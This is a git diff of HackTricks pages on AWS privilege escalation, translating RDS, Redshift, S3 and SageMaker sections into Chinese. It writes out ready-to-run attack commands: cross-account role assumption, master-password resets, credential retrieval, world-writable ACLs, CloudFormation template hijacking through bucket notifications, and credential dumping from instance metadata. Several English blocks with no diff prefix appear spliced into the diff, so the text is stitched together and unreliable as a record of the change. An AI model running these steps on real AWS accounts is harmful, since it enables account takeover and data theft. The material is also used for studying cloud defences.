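# From the management account, enumerate the member accounts
aws organizations list-accounts --query 'Accounts[].{Id:Id,Name:Name,Status:Status}'

# Try to assume the default cross-account admin role in each child account
aws sts assume-role \
--role-arn arn:aws:iam::<child-account-id>:role/OrganizationAccountAccessRole \
--role-session-name org-pivot
```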
+如果您妥协了根/管理账户,您很可能会妥协所有子账户。\ +要[**了解如何,请查看此页面**](../#compromising-the-organization)。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md index b4a08093e..61c1a603b 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md @@ -2,9 +2,9 @@ {{#include ../../../banners/hacktricks-training.md}} -## RDS - Relational Database Service +## RDS - 关系数据库服务 -For more information about RDS check: +有关 RDS 的更多信息,请查看: {{#ref}} ../aws-services/aws-relational-database-rds-enum.md @@ -12,59 +12,54 @@ For more information about RDS check: ### `rds:ModifyDBInstance` -With that permission an attacker can **modify the password of the master user**, and the login inside the database: - +拥有该权限的攻击者可以 **修改主用户的密码**,以及数据库中的登录: ```bash # Get the DB username, db name and address aws rds describe-db-instances # Modify the password and wait a couple of minutes aws rds modify-db-instance \ - --db-instance-identifier \ - --master-user-password 'Llaody2f6.123' \ - --apply-immediately +--db-instance-identifier \ +--master-user-password 'Llaody2f6.123' \ +--apply-immediately # In case of postgres psql postgresql://:@:5432/ ``` - > [!WARNING] -> You will need to be able to **contact to the database** (they are usually only accessible from inside networks). +> 您需要能够**联系数据库**(它们通常仅在内部网络中可访问)。 -**Potential Impact:** Find sensitive info inside the databases. +**潜在影响:** 在数据库中查找敏感信息。 ### rds-db:connect -According to the [**docs**](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html) a user with this permission could connect to the DB instance. +根据[**文档**](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html),具有此权限的用户可以连接到DB实例。 -### Abuse RDS Role IAM permissions +### 滥用RDS角色IAM权限 #### Postgresql (Aurora) > [!TIP] -> If running **`SELECT datname FROM pg_database;`** you find a database called **`rdsadmin`** you know you are inside an **AWS postgresql database**. - -First you can check if this database has been used to access any other AWS service. You could check this looking at the installed extensions: +> 如果运行**`SELECT datname FROM pg_database;`**时发现名为**`rdsadmin`**的数据库,您就知道您在一个**AWS postgresql数据库**中。 +首先,您可以检查此数据库是否已用于访问任何其他AWS服务。您可以通过查看已安装的扩展来检查这一点: ```sql SELECT * FROM pg_extension; ``` +如果你发现类似 **`aws_s3`** 的东西,你可以假设这个数据库对 S3 **有某种访问权限**(还有其他扩展名,如 **`aws_ml`** 和 **`aws_lambda`**)。 -If you find something like **`aws_s3`** you can assume this database has **some kind of access over S3** (there are other extensions such as **`aws_ml`** and **`aws_lambda`**). - -Also, if you have permissions to run **`aws rds describe-db-clusters`** you can see there if the **cluster has any IAM Role attached** in the field **`AssociatedRoles`**. If any, you can assume that the database was **prepared to access other AWS services**. Based on the **name of the role** (or if you can get the **permissions** of the role) you could **guess** what extra access the database has. - -Now, to **read a file inside a bucket** you need to know the full path. 
You can read it with: +此外,如果你有权限运行 **`aws rds describe-db-clusters`**,你可以在 **`AssociatedRoles`** 字段中查看 **集群是否附加了任何 IAM 角色**。如果有,你可以假设该数据库是 **为访问其他 AWS 服务而准备的**。根据 **角色的名称**(或者如果你能获取 **角色的权限**),你可以 **猜测** 数据库具有的额外访问权限。 +现在,要 **读取存储桶中的文件**,你需要知道完整路径。你可以用以下命令读取它: ```sql // Create table CREATE TABLE ttemp (col TEXT); // Create s3 uri SELECT aws_commons.create_s3_uri( - 'test1234567890678', // Name of the bucket - 'data.csv', // Name of the file - 'eu-west-1' //region of the bucket +'test1234567890678', // Name of the bucket +'data.csv', // Name of the file +'eu-west-1' //region of the bucket ) AS s3_uri \gset // Load file contents in table @@ -76,98 +71,81 @@ SELECT * from ttemp; // Delete table DROP TABLE ttemp; ``` - -If you had **raw AWS credentials** you could also use them to access S3 data with: - +如果你拥有 **原始 AWS 凭证**,你也可以使用它们访问 S3 数据,方法是: ```sql SELECT aws_s3.table_import_from_s3( - 't', '', '(format csv)', - :'s3_uri', - aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '') +'t', '', '(format csv)', +:'s3_uri', +aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '') ); ``` - > [!NOTE] -> Postgresql **doesn't need to change any parameter group variable** to be able to access S3. +> Postgresql **不需要更改任何参数组变量** 就可以访问 S3。 #### Mysql (Aurora) > [!TIP] -> Inside a mysql, if you run the query **`SELECT User, Host FROM mysql.user;`** and there is a user called **`rdsadmin`**, you can assume you are inside an **AWS RDS mysql db**. +> 在 mysql 中,如果你运行查询 **`SELECT User, Host FROM mysql.user;`** 并且有一个用户叫 **`rdsadmin`**,你可以假设你在一个 **AWS RDS mysql 数据库** 中。 -Inside the mysql run **`show variables;`** and if the variables such as **`aws_default_s3_role`**, **`aurora_load_from_s3_role`**, **`aurora_select_into_s3_role`**, have values, you can assume the database is prepared to access S3 data. +在 mysql 中运行 **`show variables;`**,如果变量如 **`aws_default_s3_role`**、**`aurora_load_from_s3_role`**、**`aurora_select_into_s3_role`** 有值,你可以假设数据库已准备好访问 S3 数据。 -Also, if you have permissions to run **`aws rds describe-db-clusters`** you can check if the cluster has any **associated role**, which usually means access to AWS services). - -Now, to **read a file inside a bucket** you need to know the full path. You can read it with: +此外,如果你有权限运行 **`aws rds describe-db-clusters`**,你可以检查集群是否有任何 **关联角色**,这通常意味着可以访问 AWS 服务。 +现在,要 **读取存储桶中的文件**,你需要知道完整路径。你可以用以下命令读取它: ```sql CREATE TABLE ttemp (col TEXT); LOAD DATA FROM S3 's3://mybucket/data.txt' INTO TABLE ttemp(col); SELECT * FROM ttemp; DROP TABLE ttemp; ``` - ### `rds:AddRoleToDBCluster`, `iam:PassRole` -An attacker with the permissions `rds:AddRoleToDBCluster` and `iam:PassRole` can **add a specified role to an existing RDS instance**. This could allow the attacker to **access sensitive data** or modify the data within the instance. - +拥有权限 `rds:AddRoleToDBCluster` 和 `iam:PassRole` 的攻击者可以 **将指定角色添加到现有的 RDS 实例**。这可能允许攻击者 **访问敏感数据** 或修改实例中的数据。 ```bash aws add-role-to-db-cluster --db-cluster-identifier --role-arn ``` - -**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance.\ -Note that some DBs require additional configs such as Mysql, which needs to specify the role ARN in the aprameter groups also. +**潜在影响**:访问敏感数据或对RDS实例中的数据进行未经授权的修改。\ +请注意,一些数据库需要额外的配置,例如Mysql,需要在参数组中指定角色ARN。 ### `rds:CreateDBInstance` -Just with this permission an attacker could create a **new instance inside a cluster** that already exists and has an **IAM role** attached. 
He won't be able to change the master user password, but he might be able to expose the new database instance to the internet: - +仅凭此权限,攻击者可以在已经存在并附加了**IAM角色**的集群中创建一个**新实例**。他将无法更改主用户密码,但他可能能够将新数据库实例暴露于互联网: ```bash aws --region eu-west-1 --profile none-priv rds create-db-instance \ - --db-instance-identifier mydbinstance2 \ - --db-instance-class db.t3.medium \ - --engine aurora-postgresql \ - --db-cluster-identifier database-1 \ - --db-security-groups "string" \ - --publicly-accessible +--db-instance-identifier mydbinstance2 \ +--db-instance-class db.t3.medium \ +--engine aurora-postgresql \ +--db-cluster-identifier database-1 \ +--db-security-groups "string" \ +--publicly-accessible ``` - ### `rds:CreateDBInstance`, `iam:PassRole` > [!NOTE] -> TODO: Test +> TODO: 测试 -An attacker with the permissions `rds:CreateDBInstance` and `iam:PassRole` can **create a new RDS instance with a specified role attached**. The attacker can then potentially **access sensitive data** or modify the data within the instance. +拥有权限 `rds:CreateDBInstance` 和 `iam:PassRole` 的攻击者可以 **创建一个附加指定角色的新 RDS 实例**。攻击者随后可能 **访问敏感数据** 或修改实例中的数据。 > [!WARNING] -> Some requirements of the role/instance-profile to attach (from [**here**](https://docs.aws.amazon.com/cli/latest/reference/rds/create-db-instance.html)): - -> - The profile must exist in your account. -> - The profile must have an IAM role that Amazon EC2 has permissions to assume. -> - The instance profile name and the associated IAM role name must start with the prefix `AWSRDSCustom` . +> 附加角色/实例配置文件的一些要求(来自 [**这里**](https://docs.aws.amazon.com/cli/latest/reference/rds/create-db-instance.html)): +> - 配置文件必须在您的账户中存在。 +> - 配置文件必须有一个 IAM 角色,Amazon EC2 有权限假设。 +> - 实例配置文件名称和关联的 IAM 角色名称必须以前缀 `AWSRDSCustom` 开头。 ```bash aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole ``` - -**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance. +**潜在影响**:访问敏感数据或对RDS实例中的数据进行未经授权的修改。 ### `rds:AddRoleToDBInstance`, `iam:PassRole` -An attacker with the permissions `rds:AddRoleToDBInstance` and `iam:PassRole` can **add a specified role to an existing RDS instance**. This could allow the attacker to **access sensitive data** or modify the data within the instance. +拥有权限 `rds:AddRoleToDBInstance` 和 `iam:PassRole` 的攻击者可以**将指定角色添加到现有的RDS实例**。这可能允许攻击者**访问敏感数据**或修改实例中的数据。 > [!WARNING] -> The DB instance must be outside of a cluster for this - +> DB实例必须位于集群之外才能实现此操作。 ```bash aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name ``` - -**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance. 
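For the Aurora MySQL caveat mentioned under `rds:AddRoleToDBCluster` above (the role ARN also has to be referenced in the cluster parameter group before `LOAD DATA FROM S3` works), a sketch of that extra step; it needs `rds:ModifyDBClusterParameterGroup`, which is not part of the permission combinations listed here:
```bash
# Reference the newly attached role in the parameter group used by the Aurora MySQL cluster
aws rds modify-db-cluster-parameter-group \
--db-cluster-parameter-group-name <cluster-parameter-group> \
--parameters "ParameterName=aws_default_s3_role,ParameterValue=<role-arn>,ApplyMethod=pending-reboot"
```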
+**潜在影响**:访问敏感数据或对RDS实例中的数据进行未经授权的修改。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md index 825c16ad6..a30998679 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md @@ -4,7 +4,7 @@ ## Redshift -For more information about RDS check: +有关 RDS 的更多信息,请查看: {{#ref}} ../aws-services/aws-redshift-enum.md @@ -12,52 +12,45 @@ For more information about RDS check: ### `redshift:DescribeClusters`, `redshift:GetClusterCredentials` -With these permissions you can get **info of all the clusters** (including name and cluster username) and **get credentials** to access it: - +拥有这些权限后,您可以获取 **所有集群的信息**(包括名称和集群用户名)并 **获取凭据** 以访问它: ```bash # Get creds aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1 # Connect, even if the password is a base64 string, that is the password psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:" -d template1 -p 5439 ``` - -**Potential Impact:** Find sensitive info inside the databases. +**潜在影响:** 在数据库中查找敏感信息。 ### `redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM` -With these permissions you can get **info of all the clusters** and **get credentials** to access it.\ -Note that the postgres user will have the **permissions that the IAM identity** used to get the credentials has. - +拥有这些权限后,您可以获取**所有集群的信息**并**获取访问凭证**。\ +请注意,postgres 用户将拥有**用于获取凭证的 IAM 身份**所具有的权限。 ```bash # Get creds aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1 # Connect, even if the password is a base64 string, that is the password psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439 ``` - -**Potential Impact:** Find sensitive info inside the databases. +**潜在影响:** 在数据库中查找敏感信息。 ### `redshift:DescribeClusters`, `redshift:ModifyCluster?` -It's possible to **modify the master password** of the internal postgres (redshit) user from aws cli (I think those are the permissions you need but I haven't tested them yet): - +可以通过 aws cli **修改内部 postgres (redshit) 用户的主密码**(我认为这是你需要的权限,但我还没有测试过): ``` aws redshift modify-cluster –cluster-identifier –master-user-password ‘master-password’; ``` +**潜在影响:** 在数据库中查找敏感信息。 -**Potential Impact:** Find sensitive info inside the databases. - -## Accessing External Services +## 访问外部服务 > [!WARNING] -> To access all the following resources, you will need to **specify the role to use**. A Redshift cluster **can have assigned a list of AWS roles** that you can use **if you know the ARN** or you can just set "**default**" to use the default one assigned. 
+> 要访问以下所有资源,您需要**指定要使用的角色**。一个 Redshift 集群**可以分配一系列 AWS 角色**,如果您知道 ARN,您可以使用这些角色,或者您可以设置“**default**”以使用分配的默认角色。 -> Moreover, as [**explained here**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html), Redshift also allows to concat roles (as long as the first one can assume the second one) to get further access but just **separating** them with a **comma**: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';` +> 此外,正如[**这里解释的**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html),Redshift 还允许连接角色(只要第一个角色可以假设第二个角色)以获得进一步的访问,但只需用**逗号**分隔它们:`iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';` ### Lambdas -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), it's possible to **call a lambda function from redshift** with something like: - +正如在[https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html)中解释的那样,可以使用类似以下内容的方式**从 Redshift 调用 Lambda 函数**: ```sql CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT) RETURNS INT @@ -65,11 +58,9 @@ STABLE LAMBDA 'lambda_function' IAM_ROLE default; ``` - ### S3 -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html), it's possible to **read and write into S3 buckets**: - +正如在 [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html) 中所解释的,可以**读取和写入 S3 存储桶**: ```sql # Read copy table from 's3:///load/key_prefix' @@ -82,30 +73,23 @@ unload ('select * from venue') to 's3://mybucket/tickit/unload/venue_' iam_role default; ``` - ### Dynamo -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), it's possible to **get data from dynamodb**: - +如[https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html)中所述,可以**从dynamodb获取数据**: ```sql copy favoritemovies from 'dynamodb://ProductCatalog' iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole'; ``` - > [!WARNING] -> The Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) option to specify the AWS Region in which the Amazon DynamoDB table is located. 
+> 提供数据的 Amazon DynamoDB 表必须在与您的集群相同的 AWS 区域中创建,除非您使用 [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) 选项来指定 Amazon DynamoDB 表所在的 AWS 区域。 ### EMR -Check [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html) +查看 [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html) ## References - [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md index 0af161cbc..0907b383b 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md @@ -6,117 +6,112 @@ ### `s3:PutBucketNotification`, `s3:PutObject`, `s3:GetObject` -An attacker with those permissions over interesting buckets might be able to hijack resources and escalate privileges. - -For example, an attacker with those **permissions over a cloudformation bucket** called "cf-templates-nohnwfax6a6i-us-east-1" will be able to hijack the deployment. The access can be given with the following policy: +拥有这些权限的攻击者可能能够劫持资源并提升权限。 +例如,拥有对名为 "cf-templates-nohnwfax6a6i-us-east-1" 的 **cloudformation bucket** 的这些权限的攻击者将能够劫持部署。可以通过以下策略授予访问权限: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": [ - "s3:PutBucketNotification", - "s3:GetBucketNotification", - "s3:PutObject", - "s3:GetObject" - ], - "Resource": [ - "arn:aws:s3:::cf-templates-*/*", - "arn:aws:s3:::cf-templates-*" - ] - }, - { - "Effect": "Allow", - "Action": "s3:ListAllMyBuckets", - "Resource": "*" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": [ +"s3:PutBucketNotification", +"s3:GetBucketNotification", +"s3:PutObject", +"s3:GetObject" +], +"Resource": [ +"arn:aws:s3:::cf-templates-*/*", +"arn:aws:s3:::cf-templates-*" +] +}, +{ +"Effect": "Allow", +"Action": "s3:ListAllMyBuckets", +"Resource": "*" +} +] } ``` - -And the hijack is possible because there is a **small time window from the moment the template is uploaded** to the bucket to the moment the **template is deployed**. An attacker might just create a **lambda function** in his account that will **trigger when a bucket notification is sent**, and **hijacks** the **content** of that **bucket**. 
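A minimal sketch of the notification half of that hijack, using the bucket name from the policy above; the Lambda lives in the attacker's account and must itself allow `s3.amazonaws.com` to invoke it from the victim bucket (an `aws lambda add-permission` call done on the attacker side):
```bash
# Make the victim's CloudFormation templates bucket notify an attacker-owned Lambda on every
# new upload; the Lambda then uses the deployment time window to swap the template content
aws s3api put-bucket-notification-configuration \
--bucket cf-templates-nohnwfax6a6i-us-east-1 \
--notification-configuration '{
"LambdaFunctionConfigurations": [{
"LambdaFunctionArn": "arn:aws:lambda:us-east-1:<attacker-account-id>:function:cfn-hijack",
"Events": ["s3:ObjectCreated:*"]
}]
}'
```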
+并且劫持是可能的,因为从**模板上传**到存储桶的那一刻到**模板部署**的那一刻之间有一个**小的时间窗口**。攻击者可能只需在他的账户中创建一个**lambda function**,当发送存储桶通知时将**触发**,并**劫持**该**存储桶**的**内容**。 ![](<../../../images/image (174).png>) -The Pacu module [`cfn__resouce_injection`](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#cfn__resource_injection) can be used to automate this attack.\ -For mor informatino check the original research: [https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/](https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/) +Pacu模块 [`cfn__resouce_injection`](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#cfn__resource_injection) 可用于自动化此攻击。\ +有关更多信息,请查看原始研究:[https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/](https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/) ### `s3:PutObject`, `s3:GetObject` -These are the permissions to **get and upload objects to S3**. Several services inside AWS (and outside of it) use S3 storage to store **config files**.\ -An attacker with **read access** to them might find **sensitive information** on them.\ -An attacker with **write access** to them could **modify the data to abuse some service and try to escalate privileges**.\ -These are some examples: +这些是**获取和上传对象到 S3**的权限。AWS内部(以及外部)的多个服务使用S3存储来存储**配置文件**。\ +具有**读取访问权限**的攻击者可能会在其中找到**敏感信息**。\ +具有**写入访问权限**的攻击者可以**修改数据以滥用某些服务并尝试提升权限**。\ +以下是一些示例: -- If an EC2 instance is storing the **user data in a S3 bucket**, an attacker could modify it to **execute arbitrary code inside the EC2 instance**. +- 如果EC2实例将**用户数据存储在S3存储桶中**,攻击者可以修改它以**在EC2实例内部执行任意代码**。 ### `s3:PutBucketPolicy` -An attacker, that needs to be **from the same account**, if not the error `The specified method is not allowed will trigger`, with this permission will be able to grant himself more permissions over the bucket(s) allowing him to read, write, modify, delete and expose buckets. 
- +攻击者需要**来自同一账户**,否则将触发错误`The specified method is not allowed`,具有此权限将能够授予自己对存储桶的更多权限,使他能够读取、写入、修改、删除和暴露存储桶。 ```bash # Update Bucket policy aws s3api put-bucket-policy --policy file:///root/policy.json --bucket ## JSON giving permissions to a user and mantaining some previous root access { - "Id": "Policy1568185116930", - "Version":"2012-10-17", - "Statement":[ - { - "Effect":"Allow", - "Principal":{ - "AWS":"arn:aws:iam::123123123123:root" - }, - "Action":"s3:ListBucket", - "Resource":"arn:aws:s3:::somebucketname" - }, - { - "Effect":"Allow", - "Principal":{ - "AWS":"arn:aws:iam::123123123123:user/username" - }, - "Action":"s3:*", - "Resource":"arn:aws:s3:::somebucketname/*" - } - ] +"Id": "Policy1568185116930", +"Version":"2012-10-17", +"Statement":[ +{ +"Effect":"Allow", +"Principal":{ +"AWS":"arn:aws:iam::123123123123:root" +}, +"Action":"s3:ListBucket", +"Resource":"arn:aws:s3:::somebucketname" +}, +{ +"Effect":"Allow", +"Principal":{ +"AWS":"arn:aws:iam::123123123123:user/username" +}, +"Action":"s3:*", +"Resource":"arn:aws:s3:::somebucketname/*" +} +] } ## JSON Public policy example ### IF THE S3 BUCKET IS PROTECTED FROM BEING PUBLICLY EXPOSED, THIS WILL THROW AN ACCESS DENIED EVEN IF YOU HAVE ENOUGH PERMISSIONS { - "Id": "Policy1568185116930", - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "Stmt1568184932403", - "Action": [ - "s3:ListBucket" - ], - "Effect": "Allow", - "Resource": "arn:aws:s3:::welcome", - "Principal": "*" - }, - { - "Sid": "Stmt1568185007451", - "Action": [ - "s3:GetObject" - ], - "Effect": "Allow", - "Resource": "arn:aws:s3:::welcome/*", - "Principal": "*" - } - ] +"Id": "Policy1568185116930", +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "Stmt1568184932403", +"Action": [ +"s3:ListBucket" +], +"Effect": "Allow", +"Resource": "arn:aws:s3:::welcome", +"Principal": "*" +}, +{ +"Sid": "Stmt1568185007451", +"Action": [ +"s3:GetObject" +], +"Effect": "Allow", +"Resource": "arn:aws:s3:::welcome/*", +"Principal": "*" +} +] } ``` - ### `s3:GetBucketAcl`, `s3:PutBucketAcl` -An attacker could abuse these permissions to **grant him more access** over specific buckets.\ -Note that the attacker doesn't need to be from the same account. Moreover the write access - +攻击者可以利用这些权限来**授予自己更多的访问权限**,以便对特定的存储桶进行操作。\ +请注意,攻击者不需要来自同一账户。此外,写入访问权限 ```bash # Update bucket ACL aws s3api get-bucket-acl --bucket @@ -125,27 +120,25 @@ aws s3api put-bucket-acl --bucket --access-control-policy file://a ##JSON ACL example ## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved. { - "Owner": { - "DisplayName": "", - "ID": "" - }, - "Grants": [ - { - "Grantee": { - "Type": "Group", - "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" - }, - "Permission": "FULL_CONTROL" - } - ] +"Owner": { +"DisplayName": "", +"ID": "" +}, +"Grants": [ +{ +"Grantee": { +"Type": "Group", +"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" +}, +"Permission": "FULL_CONTROL" +} +] } ## An ACL should give you the permission WRITE_ACP to be able to put a new ACL ``` - ### `s3:GetObjectAcl`, `s3:PutObjectAcl` -An attacker could abuse these permissions to grant him more access over specific objects inside buckets. - +攻击者可以利用这些权限来授予他对存储桶内特定对象的更多访问权限。 ```bash # Update bucket object ACL aws s3api get-object-acl --bucket --key flag @@ -154,34 +147,27 @@ aws s3api put-object-acl --bucket --key flag --access-control-poli ##JSON ACL example ## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved. 
{ - "Owner": { - "DisplayName": "", - "ID": "" - }, - "Grants": [ - { - "Grantee": { - "Type": "Group", - "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" - }, - "Permission": "FULL_CONTROL" - } - ] +"Owner": { +"DisplayName": "", +"ID": "" +}, +"Grants": [ +{ +"Grantee": { +"Type": "Group", +"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" +}, +"Permission": "FULL_CONTROL" +} +] } ## An ACL should give you the permission WRITE_ACP to be able to put a new ACL ``` - ### `s3:GetObjectAcl`, `s3:PutObjectVersionAcl` -An attacker with these privileges is expected to be able to put an Acl to an specific object version - +拥有这些权限的攻击者预计能够将 Acl 放置到特定对象版本上 ```bash aws s3api get-object-acl --bucket --key flag aws s3api put-object-acl --bucket --key flag --version-id --access-control-policy file://objacl.json ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md index 890686262..bfc370027 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md @@ -6,68 +6,60 @@ ### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl` -Start creating a noteboook with the IAM Role to access attached to it: - +开始创建一个带有附加的 IAM 角色的笔记本: ```bash aws sagemaker create-notebook-instance --notebook-instance-name example \ - --instance-type ml.t2.medium \ - --role-arn arn:aws:iam:::role/service-role/ +--instance-type ml.t2.medium \ +--role-arn arn:aws:iam:::role/service-role/ ``` - -The response should contain a `NotebookInstanceArn` field, which will contain the ARN of the newly created notebook instance. We can then use the `create-presigned-notebook-instance-url` API to generate a URL that we can use to access the notebook instance once it's ready: - +响应应包含一个 `NotebookInstanceArn` 字段,该字段将包含新创建的笔记本实例的 ARN。然后,我们可以使用 `create-presigned-notebook-instance-url` API 生成一个 URL,以便在笔记本实例准备好后访问它: ```bash aws sagemaker create-presigned-notebook-instance-url \ - --notebook-instance-name +--notebook-instance-name ``` +导航到浏览器中的 URL,点击右上角的 \`Open JupyterLab\`,然后向下滚动到“Launcher”选项卡,在“Other”部分,点击“Terminal”按钮。 -Navigate to the URL with the browser and click on \`Open JupyterLab\`\` in the top right, then scroll down to “Launcher” tab and under the “Other” section, click the “Terminal” button. +现在可以访问 IAM 角色的元数据凭证。 -Now It's possible to access the metadata credentials of the IAM Role. - -**Potential Impact:** Privesc to the sagemaker service role specified. +**潜在影响:** 提升到指定的 sagemaker 服务角色。 ### `sagemaker:CreatePresignedNotebookInstanceUrl` -If there are Jupyter **notebooks are already running** on it and you can list them with `sagemaker:ListNotebookInstances` (or discover them in any other way). You can **generate a URL for them, access them, and steal the credentials as indicated in the previous technique**. - +如果已经有 Jupyter **笔记本正在运行**,并且您可以通过 `sagemaker:ListNotebookInstances` 列出它们(或以其他方式发现它们)。您可以 **为它们生成一个 URL,访问它们,并窃取凭证,如前面技术所示**。 ```bash aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name ``` - -**Potential Impact:** Privesc to the sagemaker service role attached. 
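In either notebook scenario, once you reach the JupyterLab terminal the attached role's credentials can be confirmed and dumped; the metadata call below assumes the usual EC2 instance metadata service is reachable from the notebook (IMDSv2 shown, drop the token header if only IMDSv1 answers):
```bash
# Run inside the notebook's terminal
aws sts get-caller-identity   # confirms you are acting as the attached SageMaker role

TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
ROLE=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" "http://169.254.169.254/latest/meta-data/iam/security-credentials/")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" "http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE"
```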
